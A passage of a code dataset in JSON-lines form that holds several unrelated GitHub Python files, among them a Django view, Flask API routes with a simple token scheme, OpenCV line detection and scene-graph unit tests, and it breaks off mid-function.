governance})\n # NOTE: Vault starts unpaused\n\n performanceFeeGovernance = 1000\n performanceFeeStrategist = 1000\n withdrawalFee = 50\n\n strategy = DemoStrategy.deploy({\"from\": deployer})\n strategy.initialize(vault, [token])\n # NOTE: Strategy starts unpaused\n\n vault.setStrategy(strategy, {\"from\": governance})\n\n return DotMap(vault=vault, guestlist=guestlist, strategy=strategy)\n\n\ndef deploy_guestlist(dev, proxyAdmin, vaultAddr):\n\n guestlist_logic = TestVipCappedGuestListBbtcUpgradeable.deploy({\"from\": dev})\n\n # Initializing arguments\n args = [vaultAddr]\n\n guestlist_proxy = AdminUpgradeabilityProxy.deploy(\n guestlist_logic,\n proxyAdmin,\n guestlist_logic.initialize.encode_input(*args),\n {\"from\": dev},\n )\n time.sleep(1)\n\n ## We delete from deploy and then fetch again so we can interact\n AdminUpgradeabilityProxy.remove(guestlist_proxy)\n guestlist_proxy = TestVipCappedGuestListBbtcUpgradeable.at(guestlist_proxy.address)\n\n # console.print(\"[green] Using Guestlist in conftest.py/functional\")\n console.print(\"[green]Guestlist was deployed at: [/green]\", guestlist_proxy.address)\n\n return guestlist_proxy\n\n\n#############################################\n","repo_name":"GalloDaSballo/badger-sett-1.5","sub_path":"tests/functional/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":5583,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"35865660020","text":"import csv\nfrom django.shortcuts import render\nfrom django.views.generic import TemplateView\nfrom app.settings import INFLATION_CSV\n\n\nclass InflationView(TemplateView):\n template_name = 'inflation.html'\n\n def get(self, request, *args, **kwargs):\n # чтение csv-файла и заполнение контекста\n inflation_color = []\n headers = []\n with open(INFLATION_CSV, newline='', encoding='utf-8') as csvfile:\n reader = csv.DictReader(csvfile, delimiter=';')\n flag = True\n for row in reader:\n year = []\n keys = row.keys()\n\n for key in keys:\n month = {}\n if row[key]:\n if key == 'Г��д':\n month['count'] = int(row[key])\n else:\n month['count'] = float(row[key])\n\n if month['count'] < 0:\n month['color'] = 'green'\n\n elif 1 <= month['count'] < 2:\n month['color'] = 'orangered'\n\n elif 2 <= month['count'] < 5:\n month['color'] = 'red'\n elif month['count'] >= 5:\n month['color'] = 'darkred'\n else:\n month['color'] = 'white'\n\n if key == 'Год':\n month['color'] = 'white'\n\n elif key == 'Суммарная':\n month['color'] = 'lightgrey'\n\n else:\n month['count'] = '-'\n month['color'] = 'white'\n\n year.append(month)\n\n if flag:\n headers.append(key)\n\n flag = False\n inflation_color.append(year)\n\n context = {'data': inflation_color, 'headers': headers}\n return render(request, self.template_name,\n context)\n","repo_name":"shattl2000/Netology","sub_path":"Python_course/Part 3/dynamic-templates/task1/app/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":2103,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"21"} +{"seq_id":"33080657378","text":"from flask import Blueprint, jsonify, request\nfrom flask_login import login_required, current_user\nfrom app.api.auth_routes import validation_errors_to_error_messages\nfrom app.forms import TransactionForm\nfrom app.models import db, Transaction\nfrom datetime import datetime, timezone\n\ntransaction_routes = Blueprint('transactions', __name__)\n\n\n@transaction_routes.route('/')\n@login_required\ndef get_all_transactions():\n # Returns all transactions made by logged in user\n party_id = current_user.id\n transactions = Transaction.query.filter(Transaction.party_id == party_id).all()\n\n return { 'transactions' : [transaction.to_dict() for transaction in transactions]}, 200\n\n\n@transaction_routes.route('/new', methods=['POST'])\n@login_required\ndef post_transactions():\n party_id = current_user.id\n\n form = TransactionForm()\n form['csrf_token'].data = request.cookies['csrf_token']\n\n if form.validate_on_submit():\n # find out what it is doing\n # if type is cryptocurrency\n # find out if it is adding/removing\n # other transaction is $$$$$\n\n transaction_A = Transaction()\n transaction_B = Transaction()\n\n form.populate_obj(transaction_A)\n form.populate_obj(transaction_B)\n\n transaction_A.party_id = party_id\n transaction_B.party_id = party_id\n\n\n if transaction_A.asset_id != '$$$$$':\n # transaction_A.total = -transaction_A.total\n\n transaction_B.asset_id = '$$$$$'\n transaction_B.symbol = '$$$$$'\n transaction_B.name = '$$$$$'\n transaction_B.type = 'exchange'\n transaction_B.quantity = transaction_B.total\n\n # if transaction_A.total > 0:\n # # meaning that cash was added\n # # meaning that an asset was sold\n # # meaning that quantity must be negative\n # transaction_A.quantity = -transaction_A.quantity\n\n transaction_A.timestamp = datetime.now(timezone.utc)\n transaction_B.timestamp = datetime.now(timezone.utc)\n db.session.add(transaction_A)\n # db.session.add(transaction_B)\n db.session.commit()\n return { 'message': 'Transactions successfully posted.'}\n\n else:\n # if asset_id is $$$$$\n # then it was a deposit\n # transaction_A.type will be Bank deposit\n transaction_B.quantity = -transaction_A.quantity\n transaction_B.total = -transaction_A.quantity\n transaction_B.type = 'Bank Withdrawl'\n\n transaction_A.timestamp = datetime.now(timezone.utc)\n transaction_B.timestamp = datetime.now(timezone.utc)\n db.session.add(transaction_A)\n db.session.add(transaction_B)\n db.session.commit()\n return { 'message': 'Transactions successfully posted.'}\n else:\n return { 'errors': validation_errors_to_error_messages(form.errors) }, 400\n","repo_name":"hang-justin/robinhood-clone","sub_path":"app/api/transaction_routes.py","file_name":"transaction_routes.py","file_ext":"py","file_size_in_byte":2971,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"21"} +{"seq_id":"70255326132","text":"import sys\nfrom pprint import pprint\ninput = sys.stdin.readline\n\nh, w = map(int, input().split())\ngrid = [list(input().strip()) for _ in range(h)]\n\n# print('input----->')\n# pprint(grid)\n# print('<-----input')\n\nd_mark = ['^', '>', 'v', '<']\ndy = [-1, 0, 1, 0]\ndx = [0, 1, 0, -1]\n\ndef findStart(grid):\n # print('findStart----->')\n for j in range(h):\n for i in range(w):\n if grid[j][i] == '#':\n direction = findDirection(j, i)\n # print(f'direction: {direction}')\n if direction != -1:\n # print(f'start (y, x): ({j}, {i})')\n print(j+1, i+1)\n # print(f'direction: {d_mark[direction]}')\n print(d_mark[direction])\n # print('<-----findStart')\n return j, i, direction\n\ndef findDirection(y, x):\n # print('findDirection----->')\n count = 0\n for k in range(4):\n ny = y + dy[k]\n nx = x + dx[k]\n if 0 <= ny < h and 0 <= nx < w:\n if grid[ny][nx] == '#':\n # print(f'ny, nx: ({ny}, {nx})')\n direction = k\n count += 1\n # print(f'direction, count : {direction}, {count}')\n # print('<-----findDirection')\n return direction if count == 1 else -1\n\ndef navigate(y, x, direction):\n grid[y][x] = '.'\n prevDir = nextDir = direction\n while True:\n while prevDir == nextDir:\n print('A', end='')\n y = y + dy[prevDir]\n x = x + dx[prevDir]\n grid[y][x] = '.'\n y = y + dy[prevDir]\n x = x + dx[prevDir]\n grid[y][x] = '.'\n\n nextDir = findDirection(y, x)\n # print(f'prevDir, nextDir : {prevDir}, {nextDir}')\n if nextDir == -1:\n return\n if (nextDir - prevDir) % 4 == 1:\n print('R', end='')\n elif (nextDir - prevDir) % 4 == 3:\n print('L', end='')\n prevDir = nextDir\n\nsy, sx, direction = findStart(grid)\nnavigate(sy, sx, direction)","repo_name":"vfrnji124/algorithm_practice","sub_path":"HSAT/HSAT_01_로봇이_지나간_경로.py","file_name":"HSAT_01_로봇이_지나간_경로.py","file_ext":"py","file_size_in_byte":2055,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"74345548853","text":"import cv2 as cv\nimport numpy as np\n\n\ndef main(video):\n low = {\"H\":32,\"S\":80,\"V\":62}\n high = {\"H\":114,\"S\":255,'V':132}\n src_window = \"Source\"\n dst_window = \"Output\"\n building(video,high,low,src_window,dst_window)\n\ndef building(video,high,low,src_window,dst_window):\n cv.namedWindow(src_window)\n cv.namedWindow(dst_window)\n while True:\n ret,frame = video.read()\n if frame is None:\n break\n key = cv.waitKey(10)\n if key == ord('p'):\n cv.waitKey(-1)\n frame_HSV = cv.cvtColor(frame,cv.COLOR_BGR2HSV)\n frame_threshold = cv.inRange(frame_HSV,(low[\"H\"],low[\"S\"],low[\"V\"]),(high[\"H\"],high['S'],high[\"V\"]))\n canimg = hough(frame_HSV)\n ##cv.imshow(src_window, frame)\n cv.imshow(dst_window, frame_threshold)\n cv.imshow(\"NewFrame\",canimg)\n if key == ord('q') or key == 27:\n break\n video.release()\n cv.destroyAllWindows()\n\ndef hough(frame):\n newimg = cv.cvtColor(frame,cv.COLOR_BGR2GRAY)\n canimg = cv.Canny(newimg,50,200)\n lines = cv.HoughLines(canimg,1,np.pi/180,120,np.array([]))\n for line in lines:\n rho,theta = line[0]\n a = np.cos(theta)\n b = np.sin(theta)\n x0 = a*rho\n y0 = b*rho\n x1 = int(x0+1000*(-b))\n y1 = int(y0 + 1000*(a))\n x2 = int(x0 -1000*(-b))\n y2 = int(y0 - 1000 *(1))\n cv.line(frame, (x1,y1), (x2,y2), (0,0,255), 2)\n #cv.imshow(\"Lines\",frame)\n #cv.imshow(\"Canny\",canimg)\n #cv.waitKey(0)\n return canimg\n\nif __name__ == \"__main__\":\n video = cv.VideoCapture(r\"../footage/longgame.mp4\")\n main(video)","repo_name":"Bdkelly/BenKelly_MnM4SDS_project_draft","sub_path":"src/testhough.py","file_name":"testhough.py","file_ext":"py","file_size_in_byte":1638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"4241791370","text":"from UM.Mesh.MeshData import MeshData\nfrom UM.Scene.GroupDecorator import GroupDecorator\nfrom UM.Scene.SceneNode import SceneNode\n\nfrom UM.Math.Vector import Vector\nfrom UM.Math.Quaternion import Quaternion\nfrom UM.Math.Matrix import Matrix\nfrom UM.Math.Float import Float\n\nimport unittest\nimport math\n\nfrom copy import deepcopy\n\nclass SceneNodeTest(unittest.TestCase):\n def setUp(self):\n pass\n\n def tearDown(self):\n pass\n\n def test_setPosition(self):\n node = SceneNode()\n\n self.assertEqual(node.getPosition(), Vector(0, 0, 0))\n\n node.setPosition(Vector(0, 0, 10))\n\n self.assertEqual(node.getPosition(), Vector(0, 0, 10))\n\n node.setPosition(Vector(0, 0, 10))\n\n self.assertEqual(node.getPosition(), Vector(0, 0, 10))\n\n def test_translate(self):\n node = SceneNode()\n\n self.assertEqual(node.getPosition(), Vector(0, 0, 0))\n\n node.translate(Vector(0, 0, 10))\n\n self.assertEqual(node.getPosition(), Vector(0, 0, 10))\n\n node.translate(Vector(0, 0, 10))\n\n self.assertEqual(node.getPosition(), Vector(0, 0, 20))\n\n def test_setOrientation(self):\n node = SceneNode()\n\n self.assertEqual(node.getOrientation(), Quaternion())\n\n node.setOrientation(Quaternion.fromAngleAxis(math.pi / 4, Vector.Unit_Z))\n\n self.assertEqual(node.getOrientation(), Quaternion.fromAngleAxis(math.pi / 4, Vector.Unit_Z))\n\n node.setOrientation(Quaternion.fromAngleAxis(math.pi / 4, Vector.Unit_Z))\n\n self.assertEqual(node.getOrientation(), Quaternion.fromAngleAxis(math.pi / 4, Vector.Unit_Z))\n\n def test_rotate(self):\n node = SceneNode()\n\n self.assertEqual(node.getOrientation(), Quaternion())\n\n node.rotate(Quaternion.fromAngleAxis(math.pi / 4, Vector.Unit_Z))\n\n self.assertEqual(node.getOrientation(), Quaternion.fromAngleAxis(math.pi / 4, Vector.Unit_Z))\n\n node.rotate(Quaternion.fromAngleAxis(math.pi / 4, Vector.Unit_Z))\n\n self.assertEqual(node.getOrientation(), Quaternion.fromAngleAxis(math.pi / 2, Vector.Unit_Z))\n\n def test_setScale(self):\n node = SceneNode()\n\n self.assertEqual(node.getScale(), Vector(1, 1, 1))\n\n node.setScale(Vector(1.5, 1.5, 1.5))\n\n self.assertEqual(node.getScale(), Vector(1.5, 1.5, 1.5))\n\n node.setScale(Vector(1.5, 1.5, 1.5))\n\n self.assertEqual(node.getScale(), Vector(1.5, 1.5, 1.5))\n\n def test_scale(self):\n node = SceneNode()\n\n self.assertEqual(node.getScale(), Vector(1, 1, 1))\n\n node.scale(Vector(1.5, 1.5, 1.5))\n\n self.assertEqual(node.getScale(), Vector(1.5, 1.5, 1.5))\n\n node.scale(Vector(1.5, 1.5, 1.5))\n\n self.assertEqual(node.getScale(), Vector(2.25, 2.25, 2.25))\n\n def test_translateWorld(self):\n node1 = SceneNode()\n\n node2 = SceneNode(node1)\n\n self.assertEqual(node2.getWorldPosition(), Vector(0, 0, 0))\n\n node1.translate(Vector(0, 0, 10))\n\n self.assertEqual(node1.getWorldPosition(), Vector(0, 0, 10))\n self.assertEqual(node2.getWorldPosition(), Vector(0, 0, 10))\n\n node2.translate(Vector(0, 0, 10))\n\n self.assertEqual(node1.getWorldPosition(), Vector(0, 0, 10))\n self.assertEqual(node2.getWorldPosition(), Vector(0, 0, 20))\n\n node1.rotate(Quaternion.fromAngleAxis(math.pi / 2, Vector.Unit_Y))\n\n self.assertEqual(node1.getWorldPosition(), Vector(0, 0, 10))\n self.assertEqual(node2.getWorldPosition(), Vector(10, 0, 10))\n\n node2.translate(Vector(0, 0, 10))\n\n # Local translation on Z with a parent rotated 90 degrees results in movement on X axis\n pos = node2.getWorldPosition()\n #Using fuzzyCompare due to accumulation of floating point error\n self.assertTrue(Float.fuzzyCompare(pos.x, 20, 1e-5), \"{0} does not equal {1}\".format(pos, Vector(20, 0, 10)))\n self.assertTrue(Float.fuzzyCompare(pos.y, 0, 1e-5), \"{0} does not equal {1}\".format(pos, Vector(20, 0, 10)))\n self.assertTrue(Float.fuzzyCompare(pos.z, 10, 1e-5), \"{0} does not equal {1}\".format(pos, Vector(20, 0, 10)))\n\n node2.translate(Vector(0, 0, 10), SceneNode.TransformSpace.World)\n\n # World translation on Z with a parent rotated 90 degrees results in movement on Z axis\n pos = node2.getWorldPosition()\n self.assertTrue(Float.fuzzyCompare(pos.x, 20, 1e-5), \"{0} does not equal {1}\".format(pos, Vector(20, 0, 20)))\n self.assertTrue(Float.fuzzyCompare(pos.y, 0, 1e-5), \"{0} does not equal {1}\".format(pos, Vector(20, 0, 20)))\n self.assertTrue(Float.fuzzyCompare(pos.z, 20, 1e-5), \"{0} does not equal {1}\".format(pos, Vector(20, 0, 20)))\n\n node1.translate(Vector(0, 0, 10))\n\n self.assertEqual(node1.getWorldPosition(), Vector(10, 0, 10))\n\n pos = node2.getWorldPosition()\n self.assertTrue(Float.fuzzyCompare(pos.x, 30, 1e-5), \"{0} does not equal {1}\".format(pos, Vector(30, 0, 20)))\n self.assertTrue(Float.fuzzyCompare(pos.y, 0, 1e-5), \"{0} does not equal {1}\".format(pos, Vector(30, 0, 20)))\n self.assertTrue(Float.fuzzyCompare(pos.z, 20, 1e-5), \"{0} does not equal {1}\".format(pos, Vector(30, 0, 20)))\n\n node1.scale(Vector(2, 2, 2))\n\n pos = node2.getWorldPosition()\n self.assertTrue(Float.fuzzyCompare(pos.x, 50, 1e-4), \"{0} does not equal {1}\".format(pos, Vector(50, 0, 30)))\n self.assertTrue(Float.fuzzyCompare(pos.y, 0, 1e-4), \"{0} does not equal {1}\".format(pos, Vector(50, 0, 30)))\n self.assertTrue(Float.fuzzyCompare(pos.z, 30, 1e-4), \"{0} does not equal {1}\".format(pos, Vector(50, 0, 30)))\n\n node2.translate(Vector(0, 0, 10))\n\n pos = node2.getWorldPosition()\n self.assertTrue(Float.fuzzyCompare(pos.x, 70, 1e-4), \"{0} does not equal {1}\".format(pos, Vector(70, 0, 30)))\n self.assertTrue(Float.fuzzyCompare(pos.y, 0, 1e-4), \"{0} does not equal {1}\".format(pos, Vector(70, 0, 30)))\n self.assertTrue(Float.fuzzyCompare(pos.z, 30, 1e-4), \"{0} does not equal {1}\".format(pos, Vector(70, 0, 30)))\n\n # World space set position\n node1 = SceneNode()\n node2 = SceneNode(node1)\n node1.setPosition(Vector(15,15,15))\n node2.setPosition(Vector(10,10,10))\n self.assertEqual(node2.getWorldPosition(), Vector(25, 25, 25))\n #node2.setPosition(Vector(15,15,15), SceneNode.TransformSpace.World)\n #self.assertEqual(node2.getWorldPosition(), Vector(15, 15, 15))\n #self.assertEqual(node2.getPosition(), Vector(0,0,0))\n\n node1.setPosition(Vector(15,15,15))\n node2.setPosition(Vector(0,0,0))\n node2.rotate(Quaternion.fromAngleAxis(-math.pi / 2, Vector.Unit_Y))\n node2.translate(Vector(10,0,0))\n self.assertEqual(node2.getWorldPosition(), Vector(15,15,25))\n\n node2.setPosition(Vector(15,15,25), SceneNode.TransformSpace.World)\n self.assertEqual(node2.getWorldPosition(), Vector(15,15,25))\n self.assertEqual(node2.getPosition(), Vector(0,0,10))\n\n def test_setName(self):\n node = SceneNode()\n node.setName(\"DERP\")\n assert node.getName() == \"DERP\"\n\n def test_getDepth(self):\n node1 = SceneNode()\n node2 = SceneNode()\n node3 = SceneNode()\n node4 = SceneNode()\n\n node1.addChild(node2)\n node1.addChild(node3)\n node2.addChild(node4)\n\n assert node1.getDepth() == 0\n assert node2.getDepth() == 1\n assert node3.getDepth() == 1\n assert node4.getDepth() == 2\n\n def test_visibility(self):\n node1 = SceneNode()\n node1.setVisible(True)\n assert node1.isVisible()\n\n node2 = SceneNode()\n node1.addChild(node2)\n node2.setVisible(True)\n assert node2.isVisible()\n\n node1.setVisible(False)\n assert not node1.isVisible()\n assert not node2.isVisible()\n\n def test_enabled(self):\n node1 = SceneNode()\n node1.setEnabled(True)\n assert node1.isEnabled()\n\n node2 = SceneNode()\n node1.addChild(node2)\n node2.setEnabled(True)\n assert node2.isEnabled()\n\n node1.setEnabled(False)\n assert not node1.isEnabled()\n assert not node2.isEnabled()\n\n def test_removeChildren(self):\n node1 = SceneNode()\n node2 = SceneNode()\n node1.addChild(node2)\n assert node1.hasChildren()\n\n node1.removeAllChildren()\n\n assert not node1.hasChildren()\n\n def test_getAllChildren(self):\n parent_node = SceneNode()\n child_node_1 = SceneNode()\n child_node_2 = SceneNode()\n parent_node.addChild(child_node_1)\n parent_node.addChild(child_node_2)\n\n child_1_of_child_node_1 = SceneNode()\n child_2_of_child_node_1 = SceneNode()\n child_node_1.addChild(child_1_of_child_node_1)\n child_node_1.addChild(child_2_of_child_node_1)\n\n child_1_of_child_node_2 = SceneNode()\n child_node_2.addChild(child_1_of_child_node_2)\n\n assert parent_node.getAllChildren() == [child_node_1, child_node_2, child_1_of_child_node_1, child_2_of_child_node_1, child_1_of_child_node_2]\n\n def test_rotateWorld(self):\n pass\n\n def test_scaleWorld(self):\n node1 = SceneNode()\n node2 = SceneNode(node1)\n\n node2.scale(Vector(1.5,1.,1.))\n node2.translate(Vector(10,10,10))\n self.assertEqual(node2.getWorldPosition(), Vector(15,10,10))\n node2.scale(Vector(1.5,1,1))\n self.assertEqual(node2.getWorldPosition(), Vector(15,10,10))\n\n def test_deepCopy(self):\n node_1 = SceneNode()\n node_2 = SceneNode()\n node_1.translate(Vector(1, 2, 3))\n node_1.scale(Vector(1.5, 1., 1.))\n node_1.setMeshData(MeshData())\n node_1.addChild(node_2)\n node_1.addDecorator(GroupDecorator())\n copied_node = deepcopy(node_1)\n\n assert copied_node.getScale() == Vector(1.5, 1, 1)\n assert copied_node.getPosition() == Vector(1, 2, 3)\n assert len(copied_node.getChildren()) == 1\n # Ensure that the decorator also got copied\n assert copied_node.callDecoration(\"isGroup\")\n\n def test_addRemoveDouble(self):\n # Adding a child that's already a child of a node should not cause issues. Same for trying to remove one that isn't a child\n\n node_1 = SceneNode()\n node_2 = SceneNode()\n # Should work\n node_1.addChild(node_2)\n # Should still work!\n node_1.addChild(node_2)\n\n # This has already been tested somewhere else, so no problems are expected\n node_1.removeChild(node_2)\n # Doing it again shouldn't break.\n node_1.removeChild(node_2)\n\nif __name__ == \"__main__\":\n unittest.main()\n","repo_name":"DapDeveloper/Uranium","sub_path":"tests/Scene/TestSceneNode.py","file_name":"TestSceneNode.py","file_ext":"py","file_size_in_byte":10711,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"2586346539","text":"from time import sleep\r\nimport os\r\nresp=0\r\nn1= int(input('Digite o primeiro número: '))\r\nn2= int(input('Digite o segundo número: '))\r\nwhile resp != '5':\r\n resp=str(input('''OPÇÕES:\r\n [1]SOMAR\r\n [2]MULTIPLICAR\r\n [3]MAIOR\r\n [4]DIGITAR NOVOS NÚMEROS\r\n [5]SAIR DO PROGRAMA\r\n Escolha uma das opções acima: '''))\r\n if resp == '1': #PARTE SOMA DO MENU\r\n print('SOMANDO OS NÚMEROS... AGUARDE')\r\n sleep(1)\r\n print(f'A soma dos números é {n1+n2}.')\r\n elif resp == '2': #PARTE MULT DO MENU\r\n print('MULTIPLICANDO OS NÚMEROS.. AGUARDE')\r\n sleep(1)\r\n print(f'O produto dos valores digitados é {n1*n2}.')\r\n elif resp == '3': #PARTE MAIOR NÚMERO DO MENU \r\n print('CALCULANDO O MAIOR NÚMERO... AGUARDE')\r\n sleep(1)\r\n if n1 > n2:\r\n print(f'O maior número é {n1}.')\r\n elif n1 < n2:\r\n print(f'O maior número é {n2}.')\r\n elif n2==n1:\r\n print('Os números são iguais.')\r\n elif resp == '4': #PARTE DE ESCOLHER NOVOS NÚMEROS\r\n print('ESCOLHA NOVOS NÚMEROS')\r\n n1=int(input('Primeiro valor: '))\r\n n2=int(input('Segundo valor: '))\r\n elif resp not in '54321':\r\n print('OPÇÃO INVÁLIDA !')\r\n sleep(2)\r\nprint('Você finalizou o programa')\r\n","repo_name":"marciof2/PYTHON-","sub_path":"desafio59.py","file_name":"desafio59.py","file_ext":"py","file_size_in_byte":1312,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"43802830509","text":"import re\nimport sys\nimport codecs\nimport csv\nimport json\n\nfieldnames = ['entry', 'defid', 'word', 'author', 'definition', 'example', 'thumbs_up', 'thumbs_down']\n\ndb_file = sys.argv[1]\ndb_processed_file = db_file + '.processed'\ncsv_file = sys.argv[2]\n\n# Make sure readline will work properly by removing unicode line breaks\nwith codecs.open(db_file, 'r', encoding='utf-8') as f:\n with codecs.open(db_processed_file, 'w', encoding='utf8') as out:\n for line in f:\n if line[-1] != '\\n':\n out.write(line[:-1].strip())\n else:\n out.write(line.strip() + '\\n')\n\n\nwith codecs.open(db_processed_file, 'r', encoding='utf-8') as f:\n with codecs.open(csv_file, 'w', encoding='utf8') as csvfile:\n writer = csv.DictWriter(csvfile, fieldnames=fieldnames, quoting=csv.QUOTE_ALL)\n writer.writeheader()\n for line in f:\n data = json.loads(line)\n if not 'entry' in data:\n continue\n entry = data['entry']\n for d in data['definitions']:\n writer.writerow({\n 'entry': entry,\n 'defid': d['defid'],\n 'word': d['word'],\n 'author': d['author'],\n 'definition': d['definition'],\n 'example': d['example'],\n 'thumbs_up': d['thumbs_up'],\n 'thumbs_down': d['thumbs_down'],\n })\n","repo_name":"mattbierner/urban-dictionary-entry-collector","sub_path":"gen_csv.py","file_name":"gen_csv.py","file_ext":"py","file_size_in_byte":1469,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"21"} +{"seq_id":"86302214920","text":"from flask import Flask, request\nfrom flask_restful import abort, Api, Resource\nimport sys,os,time\nimport sqlobject,json\nimport md5 # inseguro pero es un ejemplo demostrativo. \n#from myapp.Contact import Contact\n\napp = Flask(__name__)\napi = Api(app)\n\n\ndef IsValid(token):\n\tquery = TokenObj.q.token==token\n\tif TokenObj.select(query).count() == 1:\n\t\treturn True\n\telse:\n\t\treturn False\n\n\ndef get_elements(data):\n\tret = dict()\n\ttry:\n\t\telements = data.split('&')\n\t\tfor tupla in elements:\n\t\t\tdatos = tupla.split('=')\n\t\t\tif datos[1]: \n\t\t\t\tret[datos[0]]=datos[1]\n\t\treturn ret\n\texcept Exception as e:\n\t\treturn ret\n\n\nclass UserObj(sqlobject.SQLObject):\n\tname = sqlobject.StringCol(length=40, unique=True)\n\tcontact = sqlobject.MultipleJoin('ContactObj', joinColumn='user')\n\nclass TokenObj(sqlobject.SQLObject):\n\ttoken = sqlobject.StringCol(length=256, unique=True)\n\nclass ContactObj(sqlobject.SQLObject):\n\tdata = sqlobject.StringCol(length=256, unique=True)\n\tdatatype = sqlobject.StringCol(length=60)\n\tuser = sqlobject.ForeignKey('UserObj')\n\n\nclass User(Resource):\n\n\tdef get(self,data):\n\t\ttry:\n\t\t\targs = get_elements(data)\n\t\t\tif IsValid(args['token']):\n\t\t\t\tif args['name'] is not None:\n\t\t\t\t\tquery = UserObj.q.name==args['name']\n\t\t\t\t\tuser = UserObj.select(query)[0]\n\t\t\t\t\tif UserObj.select(query).count() == 0:\n\t\t\t\t\t\treturn {'Error':'Not Found'}, 404\n\t\t\t\t\treturn {'id': user.id,'name' : user.name},\n\t\t\t\telse:\n\t\t\t\t\tlista = {}\n\t\t\t\t\tfor user in UserObj.select():\n\t\t\t\t\t\tlista[user.id] = user.name\n\t\t\t\t\treturn lista\n\t\t\telse:\n\t\t\t\treturn {'Error':'Invalid Token'}, 401\n\t\texcept Exception as e:\n\t\t\treturn {'Error':'Bad Request'}, 400\n\n\n\tdef put(self,data):\n\t\ttry:\n\t\t\targs = get_elements(data)\n\t\t\tif IsValid(args['token']):\n\t\t\t\tif args['name'] is not None and args['id'] is not None:\n\t\t\t\t\ttry:\n\t\t\t\t\t\tuser = UserObj.get(args['id'])\n\t\t\t\t\texcept Exception as e:\n\t\t\t\t\t\treturn {'Error':'User Not Found'}, 404\n\t\t\t\t\tuser.set(name=args['name'])\n\t\t\t\t\tuser = UserObj.get(args['id'])\n\t\t\t\treturn {'id': user.name}, 201\n\t\t\telse:\n\t\t\t\treturn {'Error':'Invalid Token'}, 401\n\t\texcept Exception as e:\n\t\t\treturn {'Error':'Bad Request'}, 400\n\n\n\n\tdef delete(self,data):\n\t\ttry:\n\t\t\targs = get_elements(data)\n\t\t\tif IsValid(args['token']):\n\t\t\t\tif args['name'] is not None:\n\t\t\t\t\tquery = UserObj.q.name==args['name']\n\t\t\t\t\tuser = UserObj.select(query)\n\t\t\t\t\tUserObj.delete(user.id)\n\t\t\t\treturn {'message': 'Done'},\n\t\t\telse:\n\t\t\t\treturn {'Error':'Invalid Token'}, 401\n\t\texcept Exception as e:\n\t\t\treturn {'Error':'Bad Request'}, 400\n\n\n\n\tdef post(self,data):\n\t\ttry:\n\t\t\targs = get_elements(data)\n\t\t\tif IsValid(args['token']):\n\t\t\t\tif args['name'] is not None:\n\t\t\t\t\tUserObj(name=args['name'])\n\t\t\t\treturn {'id': args['name']}, 201\n\t\t\telse:\n\t\t\t\treturn {'Error':'Invalid Token'}, 401\n\t\texcept Exception as e:\n\t\t\treturn {'Error':'Bad Request'}, 400\n\n\n\n# Set token, only demostration\nclass Token(Resource):\n\n\tdef get(self):\n\t\ttoken = md5.new( str(time.time())).hexdigest()\n\t\tTokenObj(token=token)\n\t\treturn {'Token': token }\n\t\n\tdef put(self):\n\t\treturn {'Error':'Forbidden'}, 403\n\n\tdef post(self):\n\t\treturn {'Error':'Forbidden'}, 403\n\n\tdef delete(self):\n\t\treturn {'Error':'Forbidden'}, 403\n\n\n\nclass Contact(Resource):\n\n\tdef put(self,data):\n\t\ttry:\n\t\t\targs = get_elements(data)\n\t\t\tif IsValid(args['token']):\n\t\t\t\tif args['data'] != '' and args['id'] != '' and args['datatype'] != '':\n\t\t\t\t\ttry:\n\t\t\t\t\t\tcontact = ContactObj.get(args['id'])\n\t\t\t\t\texcept Exception as e:\n\t\t\t\t\t\treturn {'Error':'Contact Not Found'}, 404\n\t\t\t\t\ttry:\n\t\t\t\t\t\tuser = UserObj.get(args['user'])\n\t\t\t\t\texcept Exception as e:\n\t\t\t\t\t\treturn {'Error':'User Not Found'}, 404\n\t\t\t\t\tcontact.set(data=args['data'])\n\t\t\t\t\tcontact.set(datatype=args['datatype'])\n\t\t\t\t\tcontact = ContactObj.get(args['id'])\n\t\t\t\treturn {'id': contact.id, 'data': contact.data, 'datatype': contact.datatype}, 200\n\t\t\telse:\n\t\t\t\treturn {'Error':'Invalid Token'}, 401\n\t\texcept Exception as e:\n\t\t\treturn {'Error':'Bad Request'}, 400\n\n\n\tdef delete(self,data):\n\t\ttry:\n\t\t\targs = get_elements(data)\n\t\t\tif IsValid(args['token']):\n\t\t\t\tif args['id'] != '':\n\t\t\t\t\ttry:\n\t\t\t\t\t\tcontact = ContactObj.get(args['id'])\n\t\t\t\t\t\tContactObj.delete(contact.id)\n\t\t\t\t\texcept Exception as e:\n\t\t\t\t\t\treturn {'Error':'Bad Request'}, 400\n\n\t\t\t\treturn {'message': 'Done'}, 200\n\t\t\telse:\n\t\t\t\treturn {'Error':'Invalid Token'}, 401\n\t\texcept Exception as e:\n\t\t\treturn {'Error':'Bad Request'}, 400\n\n\n\n\n\tdef get(self,data):\n\t\ttry:\n\t\t\targs = get_elements(data)\n\t\t\tif IsValid(args['token']):\n\t\t\t\tif args['user'] is not None:\n\t\t\t\t\ttry:\n\t\t\t\t\t\tuser = UserObj.get(args['user'])\n\t\t\t\t\texcept Exception as e:\n\t\t\t\t\t\treturn {'Error':'User Not Found'}, 404\n\t\t\t\tret = dict()\n\t\t\t\tcontact = ContactObj.select(ContactObj.q.user==user)\n\t\t\t\tfor i in xrange(0,contact.count()):\n\t\t\t\t\tret[i] = {'id':contact[i].id,'data': contact[i].data ,'datatype': contact[i].datatype }\n\t\t\t\treturn json.dumps(ret), 200\n\t\t\telse:\n\t\t\t\treturn {'Error':'Invalid Token'}, 401\n\t\texcept Exception as e:\n\t\t\treturn {'Error':'Bad Request'}, 400\n\n\n\n\tdef post(self,data):\n\t\ttry:\n\t\t\targs = get_elements(data)\n\t\t\tif IsValid(args['token']):\n\t\t\t\tif args['user'] is not None:\n\t\t\t\t\ttry:\n\t\t\t\t\t\tuser = 